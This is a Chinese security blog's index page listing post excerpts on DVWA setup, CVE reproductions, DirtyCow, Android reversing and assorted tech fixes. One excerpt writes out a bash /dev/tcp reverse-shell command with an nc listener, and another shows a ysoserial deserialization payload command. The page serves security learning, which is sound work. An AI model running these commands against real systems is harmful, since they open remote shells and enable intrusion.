自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

Brucetg的博客

  • 博客(28)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 Ubuntu 20.04 搭建 DVWA 靶场

之前写过在Kali 上搭建 DVWA,因为Kali上已经预装了很多软件和依赖,所以比较方便,最近为了测试需要在Ubuntu上搭建DVWA,过程中踩了点小小的坑,故简单记录一下。

2022-06-18 09:43:59 3848 3

原创 Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134)

在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码。

2022-06-06 23:12:09 4479 2

原创 Mac M1 + Vmware Fusion 安装 Windows 11 arm版及相关问题解决

文章目录0x01. 下载并安装 vmware fusion0x02. 下载 Windows 11 内部预览版0x03. 安装 Windows 110x04. 解决虚拟机不能联网的问题0x05. 解决虚拟机无法调整分辨率的问题0x01. 下载并安装 vmware fusionvmware fusion for ARM下载地址(需要登录):https://customerconnect.vmware.com/downloads/get-download?downloadGroup=FUS-PUBTP-202

2022-05-28 16:55:08 19255 5

原创 最新Windows事件查看器.NET反序列化漏洞复现与分析

0x01. 漏洞描述4月26日在twitter上看到Orange师傅发布了个windows事件查看器的 .Net 反序列化漏洞,感觉有点意思,故抽空简单做个复现与分析。0x02. 漏洞复现测试环境:Windows 11,ARM版作者给的payload:ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\Eventv~1\RecentViews其中,%LOCALAP

2022-04-30 18:18:10 2533

原创 Spring Cloud Config 目录穿越漏洞(CVE-2020-5410) 复现

Spring Cloud ConfigSpring Cloud Config 是 Spring Cloud 中用于分布式配置管理的组件,Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。影响版本Spring Cloud Config: 2.2.0 to 2.2.2Spring Cloud Config: 2.1.0 to 2.1.8复现过程https://github.com/spring-cloud/spring-cloud-config/releas

2020-06-15 21:03:20 4986

原创 CentOS 6.3 源码安装新版本 openssl、git、curl

0x01. 安装最新版 openssl不多说,直接操作:wget https://www.openssl.org/source/openssl-1.1.1c.tar.gztar zxvf openssl-1.1.1c.tar.gzcd openssl-1.1.1c./config --prefix=/usr/local/opensslmake && make insta...

2019-07-13 14:59:13 606 1

原创 Ubuntu 18.04 编译安装 Yarn

Ubuntu 18.04 安装 Yarn0x01. 简介项目地址:https://github.com/VirusTotal/yaraYara是一款用于识别恶意软件及对其行为进行分类的安全利器。Yara会根据我们自己编写的yara规则,来对可疑软件进行一个模式匹配,若可疑软件中的一些特征与我们的yara规则匹配上了,则可以初步认定可疑软件为恶意软件。0x02. 安装1. 下载yarn源码...

2019-05-12 13:12:57 1387

原创 Android 逆向基础知识

一. 初识Apk、Dalvik字节码以及SmaliDalvik(Android操作系统的虚拟机)Dalvik VM是基于寄存器的,而JVM是基于栈的。 Dalvik有专属的文件执行格式dex(dalvik executable),而JVM执行的则是Java字节码,Dalvik VM比JVM速度更快,占用空间更少。通过Dalvik的字节码我们不能直接看到原来的逻辑代码,这时需要借助如ApkTo...

2019-01-10 21:49:37 1796

原创 米6 / MIUI10 自带电子邮件应用设置Exchange邮箱

米6 / MIUI10 自带电子邮件应用设置Exchange邮箱前言相关硬件及软件信息:米6、MIUI10、电子邮件app版本如下:1. 打开电子邮件app,添加邮箱界面如下:2. 输入邮箱账户和密码3. 点击上图中的手动设置,进入如下所示的 服务器设置 界面:前言前段时间为了方便,在米6手机自带的电子邮件app中设置了邮箱后,发现只能在内网接收到邮件(默认创建的是IMAP/POP3协议的邮箱...

2018-12-15 23:36:01 20194

原创 解决Mac 系统升级到 10.14.1后 IDA 在非英文输入法时启动crash的问题

Mac 系统升级到10.14.1后,打开IDA时出现以下问题:解决问题的方法也很简单:1. 每次打开IDA前先切换到英文输入法模式(每次都要切换,有点麻烦)2. 直接去github上下载 libqcocoa.dylib,拷贝到相应目录替换掉原来的文件即可。项目地址: https://github.com/fjh658/IDA7.0_SP下载项目中的 libqcocoa.dylib 文...

2018-11-12 20:41:37 2052

原创 PySide2 使用

使用PySide2 时遇到一个问题: ImportError: cannot import name QWebView网上搜索了下有如下发现:Qt5有两种不同的Web工具包:基于WebKit的QtWebKit和基于Chromium的较新的QtWebEngine。QWebPage和QWebView是QtWebKit的一部分,而QWebEngineView和QWebEnginePage是QtWe...

2018-09-21 10:28:22 8014 1

原创 JDWP 远程命令执行漏洞

0x01. Java 调试体系JPDA简介JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用JPDA按照抽象层次,又分为三层,分别是:JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debug和profile。JDWP(Java ...

2018-09-20 20:27:46 22359

原创 Mac中安装 Python 的 PySide 库

0x01. 直接执行以下命令安装PySide,报错pip install pyside提示无法找到qmake。经过查找资料得知qmake是QT工具包中的一个工具。0x02. 安装Qt及PySide/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install...

2018-09-20 11:54:04 1908

原创 解决MacBook Pro中adb 命令无法识别海马玩模拟器的问题

1. 安装海马玩模拟器这个不多说,如果安装失败,先安装VirtualBox,再安装海马玩模拟器。2. 执行 adb devices 命令,发现设备列表为空3. 解决办法终端执行以下命令即可:adb connect 192.168.56.101原因是Mac中的海马玩模拟器的ip是固定的,为 192.168.56.101...

2018-09-18 17:03:12 762

原创 DirtyCow(脏牛)漏洞复现

该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的脏牛提权EXP也一块放出来。 编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP该漏洞是 Linux 内核的内存子...

2018-08-20 23:31:32 27608 11

原创 Docker中部署SDN(OpenDayLight)

1. 安装Docker,我的之前已经安装好了:安装软件包apt-transport-https,使APT系统能够被https解析 sudo apt-get install apt-transport-https添加Docker repository key到本地keychain sudo apt-key adv --keyserver hkp://keyserver.ubunt...

2018-08-20 23:27:02 2047

原创 多种姿势反弹shell

在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。0x01. Bash反弹攻击者主机上执行监听:nc -lvvp port目标主机上执行:bash -i >& /dev/tcp/x.x.x.x/port 0>&1简单解释下:bash ...

2018-08-20 23:21:22 7145

原创 解决Win10运行记录不显示

1. Win10更新后,不小心改了某个选项,之后每次打开运行都需要重新输入命令,感觉比较麻烦:后来查找资料发现,是因为显示最常用的应用这一选项被关闭了但是显示最常用的应用这一选项是灰色的,无法点击,其实只要打开另一选项就可以了,方法如下:打开   设置->隐私->常规,将 允许Windows跟踪应用

2017-11-28 11:05:41 14437 2

原创 PHP反序列化漏洞学习总结

一直以来总是觉得对PHP反序列化漏洞的理解比较模糊,今天抽时间深入学习下PHP反序列化漏洞的成因以及利用方式,在此做一个总结。   参考链接:            http://bobao.360.cn/learning/detail/3193.html      http://blog.csdn.net/qq_32400847/article/details/538

2017-11-02 23:32:35 3424

原创 Eclipse卸载Spring Tool Suite插件后无法启动

前段时间为了做课设给Eclipse安装了Spring Tool Suite插件,越来越觉得Eclipse装了太多插件启动有点慢,就把Spring Tool Suite插件卸载了,然后重启Eclipse,发现无法正常启动,以下为部分错误日志:!ENTRY org.eclipse.osgi 4 0 2017-10-06 13:33:49.046!MESSAGE Application

2017-10-06 13:42:38 2346

原创 最新版Kali Linux上搭建DVWA

距离上次搭建dvwa渗透测试演练平台已经过去好长时间了,这几天重装了系统之后,原来搭建好的环境全都没了,只好再重新搭建一下,搭建的过程中发现原来的方法在最新版的Kali中已经不适用了,就记录一下,因此就有了这篇文章。        不得不说在Kali中搭建dvwa真的是很方便啊!           步骤:  1. 首先去github上下载DVWA的安装包,

2017-08-22 10:22:24 16842 6

原创 NSCTF-misc-writeup

Misc:  Kungfu 打开压缩包,里面有一张png后缀的图片,因为分比较低,感觉是套路题,直接winhex打开查看,在文件末尾发现提示:  尝试base64解码:  尝试凯撒和栅栏解密都不行,还以为是思路错误,后来队友提示后面加一个空格试试,顺利得到flag:                       

2017-07-22 00:28:54 4639

原创 第十届全国大学生信息安全竞赛一道Web题的Writeup

wanna to see your hat? http://106.75.106.203:1515/  svn文件泄露   使用dvcs-ripper将泄露文件下载下来:    进行代码审计:   关键代码: $name = str_replace("'","", trim(waf($_POST["name"]))

2017-07-15 17:01:44 7042

原创 Kali Linux安装mysql-sniffer

偶然在github上看到了mysql抓包工具mysql-sniffer,出于好奇体验了一下,不过安装过程中遇到了几个坑,在此记录一下。   项目地址: https://github.com/Qihoo360/mysql-sniffer  参照官方安装方法:    1. git clone https://github.com/Qihoo360/mysql-sniffer

2017-06-09 19:26:08 5563

原创 kali Linux 64位安装python的gmpy2库报错

前段时间 网上找了个解密RSA的Python脚本,兴高采烈地拿到Kali Linux中跑一下,然后提示没安装gmpy2这个库,接下来就遇到了一系列小的问题,大概说一下解决办法。1. 执行pip install gmpy2, 报错,提示  src/gmpy.h:252:20: fatal error: mpfr.h: 没有那个文件或目录                   

2017-04-30 20:21:12 12474 2

原创 Ubuntu循环登录问题、桌面菜单和侧边栏不显示问题解决办法

1.Ubuntu 16.04输入正确的用户名和密码之后,不能进入桌面,仍然跳回到先前的登录界面:    解决方法: 在登陆界面按Ctrl+Alt+F1组合键,出现终端,输入用户名和密码登陆之后,然后执行:                                    sudo rm -r ~/.Xauthority                               

2017-04-08 09:08:12 2905

原创 ubuntu14.04虚拟机中搭建fbctf线上比赛平台

FBCTF是一个由 facebook用PHP语言开发的在线安全比赛平台, 学生和开发者可通过此平台了解网络安全和进行安全编码的实践。FBCTF平台开源内容包括CTF游戏地图,可用平台组织自己的线上网络安全比赛。开放注册团队以及得分榜。 现有平台中的挑战包括逆向工程、取证技术、web应用程序安全、密码学和二进制攻击。       项目地址:https://github.com/faceboo

2016-12-10 13:12:50 5547 4

原创 kali linux 2.0下搭建DVWA渗透测试演练平台

DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞,在kali linux下搭建DVWA非常方便,因为所需的apache2、mysql、php等环境在kali linux中默认已经安装好了步骤:  1. 首先去github上下

2016-10-09 20:10:06 19926 7

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除